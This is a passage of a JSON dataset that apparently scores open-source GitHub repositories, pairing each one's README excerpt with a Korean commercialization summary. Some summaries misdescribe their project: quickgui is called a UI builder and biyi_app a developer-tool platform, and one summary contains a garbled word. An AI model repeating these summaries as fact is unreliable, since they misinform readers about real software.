Docs](https://img.shields.io/readthedocs/envpool)](https://envpool.readthedocs.io/) [![Unittest](https://github.com/sail-sg/envpool/actions/workflows/test.yml/badge.svg?branch=main)](https://github.com/sail-sg/envpool/actions/workflows/test.yml) [![Coverage](https://sail-sg.github.io/envpool/coverage-badge.svg)](https://sail-sg.github.io/envpool/) [![GitHub issues](https://img.shields.io/github/issues/sail-s","composite_score":0.0056,"license_safety_tag":"safe"},{"name":"HerringtonDarkholme/vue-template-compiler","github_url":"https://github.com/HerringtonDarkholme/vue-template-compiler","stars":61,"language":"Rust","license":"MIT","abandonment_months":0,"description":"# vue-template-compiler 수익화 분석\n\n## 왜 보물인가\n웹사이트를 만드는 개발자들이 필수적으로 사용하는 Vue.js 템플릿을 변환해주는 핵심 도구로, 업계에서 널리 채택된 인프라 수준의 기술입니다.\n\n## 어디에 쓸 수 있나\n\n1. **웹 빌드 플랫폼 SaaS**: 코드 없이 웹사이트를 만들어주는 노코드 플랫폼에서 백엔드 엔진으로 통합\n","readme_excerpt":"# Vue Compiler in Rust\n\n<p align=\"center\">\n<a href=\"https://rustwasm.github.io/wasm-pack/\"><img src=\"https://raw.githubusercontent.com/HerringtonDarkholme/vue-compiler/main/playground/src/assets/wasm-ferris.png\" alt=\"WebAssembly ferris\" width=\"317\"></a>\n <a href=\"https://github.com/vuejs/core\"><img src=\"https://raw.githubusercontent.com/HerringtonDarkholme/vue-compiler/main/playground/src/assets/logo.png\" alt=\"Vue\" width=\"200\"></a>\n</p>\n\n<p align=\"center\"><a href=\"https://herringtondarkholme.github.io/vue-compiler/\">Try it out in the wasm playground!</a></p>\n\n![CI](https://github.com/HerringtonDarkholme/vue-compiler/actions/workflows/ci.yml/badge.svg)\n![Playground](https://github.com/HerringtonDarkholme/vue-compiler/actions/workflows/gh-pages.yml/badge.svg)\n[![codecov](https://codecov.io/gh/HerringtonDarkholme/vue-compiler/branch/main/graph/badge.svg?token=A37GRLYA5R)](https://codecov.io/gh/HerringtonDarkholme/vue-compiler)\n\n\nEvan [says](https://github.com/vuejs/rfcs/discussions/369#di","composite_score":0.0056,"license_safety_tag":"safe"},{"name":"quickgui/quickgui","github_url":"https://github.com/quickgui/quickgui","stars":5,"language":"Dart","license":"MIT","abandonment_months":0,"description":"# quickgui 저장소 분석\n\n## 왜 보물인가\n복잡한 프로그래밍 없이 사용자 인터페이스(화면)를 빠르게 만들 수 있는 도구여서, 소프트웨어 개발 시간과 비용을 크게 단축할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 중소 소프트웨어 회사가 웹 기반 업무 관리 도구를 신속하게 출시할 때 사용\n2. **내부 업무 도구**: 대기","readme_excerpt":"<div align=\"center\">\n<img src=\".github/logo.png\" alt=\"Quickgui\" width=\"256\" />\n\n# Quickgui\n\n**An elegant virtual machine manager for the desktop**\n\n**Made with 💝 for <img src=\".github/tux.png\" align=\"top\" width=\"24\" alt=\"Tux (Linux)\"/>**\n<!--& <img src=\".github/apple.png\" align=\"top\" width=\"24\" alt=\"Apple (macOS)\"/>-->\n</div>\n\n\n<p align=\"center\">\n  &nbsp;<a href=\"https://wimpysworld.io/discord\" target=\"_blank\"><img alt=\"Discord\" src=\"https://img.shields.io/discord/712850672223125565?style=for-the-badge&logo=discord&logoColor=%23ffffff&label=Discord&labelColor=%234253e8&color=%23e4e2e2\"></a>\n</p>\n\n# Introduction\n\nQuickgui is a graphical user interface for the [Quickemu](https://github.com/quickemu-project/quickemu) virtual machine manager.\nQuickgui enables you to create and manage virtual machines from a simple and elegant interface.\nNearly 1000 operating systems supported including Windows, macOS, BSDs, and 100s of Linux distros. All with automated downloads and configuration.\n\n# Insta","composite_score":0.0056,"license_safety_tag":"safe"},{"name":"skydoves/Landscapist","github_url":"https://github.com/skydoves/Landscapist","stars":6,"language":"Kotlin","license":"Apache-2.0","abandonment_months":0,"description":"# Landscapist 상용화 분석\n\n## 왜 보물인가\n앱의 이미지나 동영상을 자동으로 예쁘게 표현하는 기술로, 사용자 경험을 크게 향상시킬 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **사진 공유 SNS 서비스**: 사용자가 업로드한 사진을 자동으로 고급스럽게 처리하여 앱 내 갤러리 품질 향상\n2. **전자상거래 플랫폼**: 판매자들의 상품 이미지를","readme_excerpt":"![landscapist](https://user-images.githubusercontent.com/24237865/127760344-bb042fe8-23e1-4014-b208-b7b549d32086.png)<br><br>\n\n<p align=\"center\">\n  <a href=\"https://devlibrary.withgoogle.com/products/android/repos/skydoves-Landscapist\"><img alt=\"Google\" src=\"https://skydoves.github.io/badges/google-devlib.svg\"/></a>\n  <a href=\"https://youtu.be/8y65xBHDHK0?feature=shared\"><img alt=\"Google\" src=\"https://skydoves.github.io/badges/youtube-landscapist.svg\"/></a>\n  <a href=\"https://github.com/doveletter\"><img alt=\"Profile\" src=\"https://skydoves.github.io/badges/dove-letter.svg\"/></a><br>\n  <a href=\"https://opensource.org/licenses/Apache-2.0\"><img alt=\"License\" src=\"https://img.shields.io/badge/License-Apache%202.0-blue.svg\"/></a>\n  <a href=\"https://android-arsenal.com/api?level=21\"><img alt=\"API\" src=\"https://img.shields.io/badge/API-21%2B-brightgreen.svg?style=flat\"/></a>\n  <a href=\"https://github.com/skydoves/Landscapist/actions\"><img[landscapist-core.md](docs/landscapist-core.md) alt=\"Bui","composite_score":0.0055,"license_safety_tag":"safe"},{"name":"swiftbar/SwiftBar","github_url":"https://github.com/swiftbar/SwiftBar","stars":6,"language":"Swift","license":"MIT","abandonment_months":0,"description":"# SwiftBar 상용화 분석\n\n## 왜 보물인가\nMac 사용자들이 자신의 작업 상황을 메뉴바에서 한눈에 확인할 수 있는 간단한 도구로, 프로그래머뿐 아니라 일반인도 쉽게 커스터마이징할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 팀의 업무 진행률, 회의 일정, 중요한 메시지를 Mac 메뉴바에서 실시간으로 확인하는 '팀 협업 ","readme_excerpt":"[![GitHub license](https://img.shields.io/github/license/swiftbar/SwiftBar.svg)](https://github.com/swiftbar/SwiftBar/blob/master/LICENSE)\n[![Latest Release](https://img.shields.io/github/v/release/swiftbar/SwiftBar)](https://github.com/swiftbar/SwiftBar/releases/latest)\n[![Github all releases](https://img.shields.io/github/downloads/swiftbar/SwiftBar/total.svg)](https://github.com/swiftbar/SwiftBar/releases/)\n\n\n<p align=\"center\">\n <img width=\"155\" alt=\"SwiftBar Logo\" src=\"Resources/logo.png\">\n</p>\n\n# SwiftBar\n\nAdd custom menu bar programs on macOS in three easy steps:\n- Write a shell script\n- Add it to SwiftBar\n- ... there is no 3rd step!\n\nYou can get plugins from awesome [BitBar repository](https://github.com/matryer/bitbar-plugins), or in SwiftBar itself using the `Get Plugins...` menu item.\n\n## How to get SwiftBar\nDownload from [GitHub Releases](https://github.com/swiftbar/SwiftBar/releases)\n\nor Install with Homebrew\n\n```\nbrew install swiftbar\n```\n\nRuns on macOS Catalina (10.15) an","composite_score":0.0055,"license_safety_tag":"safe"},{"name":"ggeorgovassilis/linuxscripts","github_url":"https://github.com/ggeorgovassilis/linuxscripts","stars":5,"language":"Shell","license":"NOASSERTION","abandonment_months":0,"description":"# linuxscripts 저장소 분석\n\n## 왜 보물인가\n리눅스 시스템 관리 작업을 자동화하는 실용적인 도구 모음으로, 반복적인 서버 관리 업무를 대폭 줄일 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **클라우드 호스팅 관리 SaaS**: 고객의 리눅스 서버를 자동으로 설정·유지보수하는 웹 서비스로 제공\n2. **기업 IT 운영 도구**: 회사 내부 ","readme_excerpt":"linuxscripts\n============\n\nScript collection for linux\n\n\n## powersave\n\nEnables some powersaving on the Asus N56VB and Ubuntu 12.04. Should work on other computers and Linuxes as well. In order to enable power saving run the script with an argument of either light, on or extra like this:\n\n```sh\npowersave.sh light\n```\n\nThe script contains self-explanatory functions grouped under a big CASE that enable various power saving features. Depending on your needs, you can re-arrange these functions to different cases. For example, I work mostly in a wireless setup, so I moved the \"disable_ethernet\" function to the \"light\" case. Also, when on the road, I don't do heavy processing, so I moved \"make_cpus_sleep\" to the \"on\" case - however my applications need a lot of CPU at work, so I'm not running the \"make_cpus_sleep\" function in the \"light\" setting. \n\n## powersave-acer-nitro5.sh\n\nScript for reducing power consumption of the Acer Nitro 5. Has four options low/medium/full/reset. The frist three do","composite_score":0.0054,"license_safety_tag":"unknown"},{"name":"biyidev/biyi_app","github_url":"https://github.com/biyidev/biyi_app","stars":9,"language":"Dart","license":"AGPL-3.0","abandonment_months":0,"description":"# biyi_app 저장소 분석\n\n## 왜 보물인가\n개발자들이 자주 사용하는 다양한 개발 도구들을 한 곳에서 통합으로 관리할 수 있는 플랫폼으로, 업무 효율성을 크게 높일 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 개발자용 웹 기반 도구 모음 구독 서비스로 월 이용료를 받는 클라우드 플랫폼\n- **내부 업pranks 도구**: I","readme_excerpt":"# BeyondTranslate\n\n[![GitHub (pre-)release](https://img.shields.io/github/release/beyondtranslate/beyondtranslate/all.svg?style=flat-square)](https://github.com/beyondtranslate/beyondtranslate/releases)\n\n**BeyondTranslate** is a convenient translation and dictionary app written in `Flutter`. [View document](https://beyondtranslate.com/docs/)\n\n---\n\nEnglish | [简体中文](./README-ZH.md)\n\n---\n\n![](https://biyidev.com/images/screenshots/biyi_extract_text_from_screen_selection.gif)\n\n## Platform Support\n\n| Linux | macOS | Windows |\n| :---: | :---: | :-----: |\n|   ✔️   |   ✔️   |    ✔️    |\n\n## Installation\n\nDownloads are available on the [Releases](https://github.com/beyondtranslate/beyondtranslate/releases/latest) page. Also check out the [website](https://biyidev.com/release-notes) for other installation methods.\n\n**To install with Homebrew, run:**\n\n```bash\nbrew tap biyidev/biyi\nbrew install biyi\n```\n\n## Development\n\n### ⚠️ Linux requirements\n\n- `appindicator3-0.1`\n- [`keybinder-3.0`](https://g","composite_score":0.0054,"license_safety_tag":"risky"},{"name":"orhun/gpg-tui","github_url":"https://github.com/orhun/gpg-tui","stars":40,"language":"Rust","license":"MIT","abandonment_months":0,"description":"# gpg-tui 분석 리포트\n\n## 왜 보물인가\n복잡한 암호화 보안 작업을 간단한 화면 인터페이스로 누구나 쉽게 할 수 있게 만든 오픈소스 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **보안 관리 SaaS**: 기업의 민감한 데이터를 암호화하고 관리하는 클라우드 서비스로 패키징\n2. **내부 업무 도구**: 회계팀, 법무팀 등이 기밀 문서를 안전하게 주","readme_excerpt":"[![Logo](assets/logo.jpg)](https://github.com/orhun/gpg-tui)\n\n[![GitHub Release](https://img.shields.io/github/v/release/orhun/gpg-tui?style=flat&labelColor=1d1d1d&color=424242&logo=GitHub&logoColor=white)](https://github.com/orhun/gpg-tui/releases)\n[![Crate Release](https://img.shields.io/crates/v/gpg-tui?style=flat&labelColor=1d1d1d&color=424242&logo=Rust&logoColor=white)](https://crates.io/crates/gpg-tui/)\n[![Coverage](https://img.shields.io/codecov/c/gh/orhun/gpg-tui?style=flat&labelColor=1d1d1d&color=424242&logo=Codecov&logoColor=white)](https://codecov.io/gh/orhun/gpg-tui)\n[![Continuous Integration](https://img.shields.io/github/actions/workflow/status/orhun/gpg-tui/ci.yml?branch=master&style=flat&labelColor=1d1d1d&color=424242&logo=GitHub%20Actions&logoColor=white)](https://github.com/orhun/gpg-tui/actions?query=workflow%3A%22Continuous+Integration%22)\n[![Continuous Deployment](https://img.shields.io/github/actions/workflow/status/orhun/gpg-tui/cd.yml?style=flat&labelColor=1d1d1","composite_score":0.0053,"license_safety_tag":"safe"},{"name":"skarnet/mdevd","github_url":"https://github.com/skarnet/mdevd","stars":10,"language":"C","license":"isc","abandonment_months":1,"description":"# mdevd 프로젝트 분석\n\n## 왜 보물인가\n컴퓨터 주변기기(USB, 프린터 등)가 연결되거나 제거될 때 자동으로 반응하는 핵심 시스템 소프트웨어로, 많은 기업의 기반 인프라를 조용히 지탱하고 있습니다.\n\n## 어디에 쓸 수 있나\n1. **IoT 기기 관리 SaaS**: 수천 개의 센서와 장비가 네트워크에 자동으로 연결/해제될 때 즉시 감지하고 관리하는","readme_excerpt":"mdevd - a mdev-compatible hotplug manager daemon\n------------------------------------------------\n\n mdevd is a daemon managing kernel hotplug events, similarly to udevd.\n It uses the same configuration file as mdev, which is a hotplug\nmanager integrated in the Busybox suite of tools. However, mdev\nneeds to be registered as a hotplug manager and the kernel forks\nan instance of mdev for every event; by contrast, mdevd is a daemon\nlistening to the netlink, and does not fork.\n\n See https://skarnet.org/software/mdevd/ for details.\n\n\n* Installation\n  ------------\n\n See the INSTALL file.\n\n\n* Contact information\n  -------------------\n\n Laurent Bercot <ska-skaware at skarnet.org>\n\n Please use the <skaware at list.skarnet.org> mailing-list for\nquestions about mdevd.\n\n","composite_score":0.0052,"license_safety_tag":"safe"},{"name":"jp7677/dxvk-nvapi","github_url":"https://github.com/jp7677/dxvk-nvapi","stars":8,"language":"C++","license":"MIT","abandonment_months":0,"description":"# jp7677/dxvk-nvapi 상품화 분석\n\n## 왜 보물인가\n게임과 그래픽 작업을 리눅스에서도 윈도우처럼 빠르고 부드럽게 실행할 수 있도록 만드는 기술입니다.\n\n## 어디에 쓸 수 있나\n1. **클라우드 게임 서비스**: 리눅스 기반 게임 스트리밍 플랫폼에서 더 많은 게임을 지원하고 성능을 개선\n2. **기업용 렌더링 도구**: 영상 제작 회사의 리","readme_excerpt":"# [DXVK-NVAPI](https://github.com/jp7677/dxvk-nvapi)\n\n## Alternative NVAPI implementation on top of [DXVK](https://github.com/doitsujin/dxvk)\n\nThis [repository](https://github.com/jp7677/dxvk-nvapi) provides an alternative implementation of NVIDIA's NVAPI/NVOFAPI library for usage with DXVK and [VKD3D-Proton](https://github.com/HansKristian-Work/vkd3d-proton). Its way of working is similar to [DXVK-AGS](https://github.com/doitsujin/dxvk-ags), but adjusted and enhanced for NVAPI.\n\nThis implementation currently offers entry points for supporting the following features in applications:\n\n- NVIDIA DLSS for Vulkan, by supporting the relevant adapter information by querying from [Vulkan](https://www.vulkan.org/).\n- NVIDIA DLSS for D3D11 and D3D12, by querying from Vulkan and forwarding the relevant calls into DXVK / VKD3D-Proton.\n- NVIDIA Reflex, by forwarding the relevant calls into either DXVK / VKD3D-Proton or its custom Vulkan layer.\n- Several NVAPI D3D11 extensions, among others `SetDept","composite_score":0.0052,"license_safety_tag":"safe"},{"name":"ipython/xkcd-font","github_url":"https://github.com/ipython/xkcd-font","stars":15,"language":"Python","license":"NOASSERTION","abandonment_months":0,"description":"# XKCD 폰트 저장소 분석\n\n## 왜 보물인가\n웹사이트와 디자인에서 손으로 그린 듯한 캐주얼한 느낌을 쉽게 표현할 수 있는 무료 폰트로, 브랜드 아이덴티티 강화에 활용 가치가 높습니다.\n\n## 어디에 쓸 수 있나\n\n**1. 온라인 에디터 SaaS**\n비전문가도 포스터/이미지를 만들 수 있는 디자인 툴에 XKCD 폰트를 내장하여, 캐주얼한 콘텐츠 제작 시","readme_excerpt":"# xkcd-font\n\nFonts derived from the handwriting of @randallmunroe, the [xkcd](https://xkcd.com) webcomic author.\nYes, it really is his handwriting, and he hopes we [fix the pesky kerning](http://xkcd.com/1015/):\n\n![I have never been as self-conscious about my handwriting as when I was inking in the caption for this comic.](https://imgs.xkcd.com/comics/kerning.png)\n[Credit to xkcd]\n\nThis repository contains two fonts, ``xkcd Script`` and ``xkcd``, each with their own characteristics (and limitations):\n\n### Font: ``xkcd Script``\n\n``xkcd Script`` is a font derived from a [handwriting sample](xkcd-script/generator/handwriting_minimal.png) provided by Randall.\nIt is far less uniform than ``xkcd``, and we think it is therefore more like a true script font.\n\n![Sample of xkcd-script](xkcd-script/samples/ipsum.png)\n\nYou can see the font as a [live preview](https://ipython.github.io/xkcd-font/preview.html), or \nfor more information about the font and how it is constructed see the [xkcd-script/RE","composite_score":0.0051,"license_safety_tag":"unknown"},{"name":"ms-jpq/coq_nvim","github_url":"https://github.com/ms-jpq/coq_nvim","stars":7,"language":"Python","license":"GPL-3.0","abandonment_months":0,"description":"# ms-jpq/coq_nvim 상용화 분석\n\n## 왜 보물인가\n프로그래머가 코드를 작성할 때 자동으로 완성 제안을 해주는 똑똑한 도우미 프로그램으로, 작업 속도를 크게 높일 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **개발자 IDE 플러그인 구독 서비스**: 코드 자동완성을 기능으로 하는 월간 구독 SaaS로 개발팀에 판매\n2. **기업 개발환경 ","readme_excerpt":"# [coq.nvim 🐔](https://ms-jpq.github.io/coq_nvim)\n\nNamed after the [famous theorem prover](https://coq.inria.fr/)\n\n`coq` also means `鸡` in [`français québécois`](https://youtu.be/ZoAhZPRBMgE), and I guess `🥖`.\n\nFast as FUCK and loads of features.\n\n## Faster Than Pure Lua\n\n- Native C in-memory B-trees\n\n- SQLite VM interrupts\n\n- Coroutine based incremental & interruptible scheduler\n\n- TCP-esque flow control\n\nMore details at the [PERFORMANCE.md](https://github.com/ms-jpq/coq_nvim/tree/coq/docs/PERF.md)\n\n## Features\n\n**Note: Due to compression, reality is _faster_ than gifs**\n\n### Fast as fuck\n\n- Results on **every keystroke**\n\n- Throttling? Never heard of her\n\n- Real time [performance statistics](https://github.com/ms-jpq/coq_nvim/tree/coq/docs/STATS.md)\n\n- Look at the gifs! The bottom few are the **fastest when I didn't slow down on purpose** to show features.\n\n### Fuzzy Search\n\n- **Typo resistant**\n\n- Recency bonus\n\n- Proximity bonus\n\n- Weighted average of [relative ranks & ensemble met","composite_score":0.005,"license_safety_tag":"restricted"},{"name":"zeldaret/botw","github_url":"https://github.com/zeldaret/botw","stars":5,"language":"C++","license":"unknown","abandonment_months":0,"description":"# zeldaret/botw 저장소 분석\n\n## 왜 보물인가\n닌텐도의 인기 게임 '젤다의 전설: 야생의 숨결'을 분석하고 재현한 기술로, 게임 개발사나 연구자들에게 매우 희귀한 참고 자료입니다.\n\n## 어디에 쓸 수 있나\n1. **게임 개발 교육 플랫폼**: 게임 개발 학원이나 온라인 강좌에서 오픈월드 게임 설계 방식을 가르치는 교재로 판매\n2. **게임 ","readme_excerpt":"# The Legend of Zelda: Breath of the Wild\n\n[![Decompilation Progress][progress-badge]][progress] [![Decompilation Progress (functions)][fn-progress-badge]][fn-progress] [![Contributors][contributors-badge]][contributors] [![Discord Channel][discord-badge]][discord]\n\n[progress]: https://botw.link/progress\n[progress-badge]: https://img.shields.io/endpoint?url=https://botw.link/badges/progress.json\n\n[fn-progress]: https://botw.link/progress\n[fn-progress-badge]: https://img.shields.io/endpoint?url=https://botw.link/badges/fn_progress.json\n\n[contributors]: https://github.com/zeldaret/botw/graphs/contributors\n[contributors-badge]: https://img.shields.io/github/contributors/zeldaret/botw\n\n[discord]: https://discord.zelda.deco.mp\n[discord-badge]: https://img.shields.io/discord/688807550715560050?color=%237289DA&logo=discord&logoColor=%23FFFFFF\n\nThis is an experimental, WIP decompilation of *The Legend of Zelda: Breath of the Wild* v1.5.0 (Switch).\n\n**This repository does not contain game asset","composite_score":0.005,"license_safety_tag":"unknown"},{"name":"derekparker/delve","github_url":"https://github.com/derekparker/delve","stars":8,"language":"Go","license":"mit","abandonment_months":0,"description":"# Delve 저장소 분석\n\n## 왜 보물인가\n프로그래머가 코드 실행 과정을 단계별로 추적하고 문제를 찾을 수 있는 디버깅 도구로, 소프트웨어 품질 관리의 필수 인프라입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 클라우드 기반 코드 검사 플랫폼에 통합하여 기업 개발팀이 버그를 빠르게 찾도록 지원\n2. **내부 업무 도구**: 소프트웨어 ","readme_excerpt":"![Delve](https://raw.githubusercontent.com/go-delve/delve/master/assets/delve_horizontal.png)\n\n[![license](https://img.shields.io/badge/license-MIT-blue.svg)](https://raw.githubusercontent.com/go-delve/delve/master/LICENSE)\n[![Go Reference](https://pkg.go.dev/badge/github.com/go-delve/delve.svg)](https://pkg.go.dev/github.com/go-delve/delve)\n[![Build Status](https://delve.teamcity.com/app/rest/builds/buildType:(id:Delve_AggregatorBuild)/statusIcon.svg)](https://delve.teamcity.com/viewType.html?buildTypeId=Delve_AggregatorBuild&guest=1)\n\nThe GitHub issue tracker is for **bugs** only. Please use the [developer mailing list](https://groups.google.com/forum/#!forum/delve-dev) for any feature proposals and discussions.\n\n### About Delve\n\n- [Installation](Documentation/installation)\n- [Getting Started](Documentation/cli/getting_started.md)\n- [Documentation](Documentation)\n  - [Command line options](Documentation/usage/dlv.md)\n  - [Command line client](Documentation/cli/README.md)\n  - [Plugins","composite_score":0.0049,"license_safety_tag":"safe"},{"name":"seek-oss/capsize","github_url":"https://github.com/seek-oss/capsize","stars":5,"language":"TypeScript","license":"MIT","abandonment_months":0,"description":"# Capsize 저장소 분석\n\n## 왜 보물인가\n웹사이트나 앱에서 텍스트 크기와 간격을 정확하게 조정해주는 도구로, 디자이너들이 일관된 글꼴 스타일을 쉽게 유지할 수 있게 해줍니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 디자인 협업 도구(피그마 같은)에 플러그인으로 통합하여 사용자들이 글꼴 설정을 자동으로 표준화하는 기능 제공\n2. ","readme_excerpt":"<img src=\"https://raw.githubusercontent.com/seek-oss/capsize/HEAD/images/capsize-header.png#gh-light-mode-only\" alt=\"Capsize\" title=\"Capsize\" width=\"443px\" />\n<img src=\"https://raw.githubusercontent.com/seek-oss/capsize/HEAD/images/capsize-header-inverted.png#gh-dark-mode-only\" alt=\"Capsize\" title=\"Capsize\" width=\"443px\" />\n<br/>\n\n> Capsize makes the sizing and layout of text as predictable as every other element on the screen.\n>\n> Using font metadata, text can now be sized according to the height of its capital letters while trimming the space above capital letters and below the baseline.\n\n```bash\nnpm install @capsizecss/core\n```\n\n- [Usage](#usage)\n  - [createStyleObject](#createstyleobject)\n  - [createStyleString](#createstylestring)\n- [Options](#options)\n  - [Text size](#text-size)\n  - [Line height](#line-height)\n  - [Font Metrics](#font-metrics)\n- [Core](#core)\n  - [createFontStack](#createfontstack)\n    - [Usage in CSS stylesheet](#usage-in-css-stylesheet-or-a-style-tag)\n    - [Us","composite_score":0.0046,"license_safety_tag":"safe"},{"name":"JakeWharton/mosaic","github_url":"https://github.com/JakeWharton/mosaic","stars":15,"language":"Kotlin","license":"Apache-2.0","abandonment_months":0,"description":"# JakeWharton/mosaic 분석 리포트\n\n## 왜 보물인가\n디지털 화면에 복잡한 레이아웃을 간단하게 만들어주는 도구로, 앱 개발자들이 훨씬 빠르고 쉽게 아름다운 화면을 구성할 수 있게 해줍니다.\n\n## 어디에 쓸 수 있나\n- **UI 디자인 자동화 SaaS**: 기업 개발팀이 앱 화면을 드래그앤드롭으로 만들고 자동으로 코드 생성받는 서비스\n- *","readme_excerpt":"# Mosaic\n\nAn experimental tool for building console UI in Kotlin using the Jetpack Compose compiler/runtime.\nInspired by [Ink](https://github.com/vadimdemedes/ink).\n\n<img src=\"samples/jest/demo.gif\">\n\nJump to:\n[Introduction](#Introduction) |\n[Usage](#Usage) |\n[Samples](#Samples) |\n[FAQ](#FAQ) |\n[License](#License)\n\n\n## Introduction\n\nThe entrypoint to Mosaic is the `runMosaic` function.\nThe lambda passed to this function is responsible for both output and performing work.\n\n```kotlin\nsuspend fun main() = runMosaic {\n  Text(\"The count is: 0\")\n}\n```\n\nTo change the output dynamically we can use local properties to hold state.\nLet's update our counter to actually count to 20.\n\n```kotlin\nsuspend fun main() = runMosaic {\n  var count by remember { mutableIntStateOf(0) }\n\n  Text(\"The count is: $count\")\n\n  LaunchedEffect(Unit) {\n    for (i in 1..20) {\n      delay(250)\n      count = i\n    }\n  }\n}\n```\n\n(Note: You may need to add imports for `androidx.compose.runtime.getValue` and `import androidx.c","composite_score":0.0045,"license_safety_tag":"safe"},{"name":"krikzz/EDN8-PRO","github_url":"https://github.com/krikzz/EDN8-PRO","stars":6,"language":"SystemVerilog","license":"unknown","abandonment_months":1,"description":"# EDN8-PRO 저장소 분석\n\n## 왜 보물인가\n레트로 게임 기기를 현대적으로 업그레이드하는 핵심 기술로, 향수를 원하는 게이머와 수집가들의 강한 수요가 있습니다.\n\n## 어디에 쓸 수 있나\n1. **레트로 게임 기기 판매 SaaS**: 업그레이드된 게임 기기를 구독 방식으로 렌탈/판매하는 온라인 서비스\n2. **게임 에뮬레이션 플랫폼**: 여러 클래식","readme_excerpt":"# EverDrive-N8 PRO Dev Sources\n\nThis repository contains libraries, tools and code examples for development targeting EverDrive-N8 PRO.\n\n## Contents\n\n| Path | Description |\n|---|---|\n| `/edio` | Examples of low level cartridge hardware access: SD card, USB, memory, FPGA registers, etc. |\n| `/edio-cmd` | USB command scripts for the `/edio` application. |\n| `/fpga` | FPGA mappers examples and reference projects. |\n| `/n8nsf` | Source code of the NSF player for EverDrive-N8 PRO. |\n| `/edlink.py` | Basic cross-platform launcher script for `edlink.exe`. Requires Mono runtime on Linux and macOS. |\n| `/edlink.exe` | USB utility for communication with EverDrive over USB. |\n\n---\n\n<p align=\"center\">\n    <img src=\"edn8pro.jpg\" alt=\"EverDrive-N8 PRO\">\n</p>","composite_score":0.0044,"license_safety_tag":"unknown"},{"name":"symfony/cache","github_url":"https://github.com/symfony/cache","stars":6,"language":"PHP","license":"mit","abandonment_months":0,"description":"# Symfony Cache 저장소 분석\n\n## 왜 보물인가\n웹사이트의 반복되는 작업을 자동으로 저장해 두었다가 재사용함으로써 속도를 수십 배 빠르게 만드는 핵심 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 고객 정보 조회 시간을 단축하는 전자상거래 플랫폼의 빠른 상품 검색 기능\n2. **내부 업무 도구**: 회사 직원들의 반복적인","readme_excerpt":"Symfony PSR-6 implementation for caching\n========================================\n\nThe Cache component provides extended\n[PSR-6](https://www.php-fig.org/psr/psr-6/) implementations for adding cache to\nyour applications. It is designed to have a low overhead so that caching is\nfastest. It ships with adapters for the most widespread caching backends.\nIt also provides a [PSR-16](https://www.php-fig.org/psr/psr-16/) adapter,\nand implementations for [symfony/cache-contracts](https://github.com/symfony/cache-contracts)'\n`CacheInterface` and `TagAwareCacheInterface`.\n\nResources\n---------\n\n * [Documentation](https://symfony.com/doc/current/components/cache.html)\n * [Contributing](https://symfony.com/doc/current/contributing/index.html)\n * [Report issues](https://github.com/symfony/symfony/issues) and\n   [send Pull Requests](https://github.com/symfony/symfony/pulls)\n   in the [main Symfony repository](https://github.com/symfony/symfony)\n","composite_score":0.0043,"license_safety_tag":"safe"},{"name":"PaperMC/paperweight","github_url":"https://github.com/PaperMC/paperweight","stars":5,"language":"Kotlin","license":"unknown","abandonment_months":0,"description":"# PaperMC/paperweight 분석\n\n## 왜 보물인가\n마인크래프트 서버 개발을 쉽게 만들어주는 핵심 도구로, 게임 개발자와 서버 운영자들이 반복적인 작업을 자동화할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 마인크래프트 서버 호스팅 플랫폼이 이 도구를 기반으로 자동화된 서버 구축·관리 기능을 제공\n2. **내부 업무","readme_excerpt":"## paperweight\n\n`paperweight` consists of three Gradle plugins:\n- `paperweight-core`: Used to build Paper\n- `paperweight-patcher`: Used to create forks of Paper or other `paperweight-patcher`-based forks\n- `paperweight-userdev`: Used to develop internals plugins using Mojang mappings\n\n### How to use this for testing:\n\n- Install `paperweight` to Maven Local:\n```bash\n./gradlew publishToMavenLocal\n```\n- Add `mavenLocal()` for plugin resolution in your test project\n  (see the [Gradle docs](https://docs.gradle.org/current/userguide/plugins.html#sec:custom_plugin_repositories) for more details)\n- Adjust the `paperweight` version in your test project\n  - Local versions of `paperweight` will use have the `-SNAPSHOT` suffix in the version from `gradle.properties` replaced by `-LOCAL-SNAPSHOT`\n\n> Most output `paperweight` creates goes into `<project-root>/.gradle/caches/paperweight`\n\n### Debugging\n\nCreate a remote JVM debug run configuration in IntelliJ which connects to port 5005, then run Grad","composite_score":0.0042,"license_safety_tag":"unknown"},{"name":"storj/drpc","github_url":"https://github.com/storj/drpc","stars":12,"language":"Go","license":"MIT","abandonment_months":0,"description":"# storj/drpc 오픈소스 분석\n\n## 왜 보물인가\n컴퓨터 간의 빠르고 안전한 통신을 위한 기반 기술로, 클라우드 서비스나 실시간 애플리케이션을 만드는 데 필수적인 인프라입니다.\n\n## 어디에 쓸 수 있나\n\n1. **실시간 협업 도구 SaaS**: 여러 사용자가 동시에 문서를 편집하거나 데이터를 공유하는 서비스의 핵심 통신 기술로 활용\n2. **엔터프","readme_excerpt":"# [![DRPC](logo.png)](https://storj.github.io/drpc/)\n\nA drop-in, lightweight gRPC replacement.\n\n[![Go Report Card](https://goreportcard.com/badge/storj.io/drpc)](https://goreportcard.com/report/storj.io/drpc)\n[![Go Doc](https://img.shields.io/badge/godoc-reference-blue.svg?style=flat-square)](https://pkg.go.dev/storj.io/drpc)\n![Beta](https://img.shields.io/badge/version-beta-green.svg)\n[![Zulip Chat](https://img.shields.io/badge/zulip-join_chat-brightgreen.svg)](https://drpc.zulipchat.com)\n\n## Links\n\n * [DRPC website](https://storj.github.io/drpc/)\n * [Examples](https://github.com/storj/drpc/tree/main/examples)\n * [Quickstart documentation](https://storj.github.io/drpc/docs.html)\n * [Launch blog post](https://www.storj.io/blog/introducing-drpc-our-replacement-for-grpc)\n\n## Highlights\n\n* Simple, at just a few thousand [lines of code](#lines-of-code).\n* [Small dependencies](./blob/main/go.mod). Only 3 requirements in go.mod, and 9 lines of `go mod graph`!\n* Compatible. Works for many 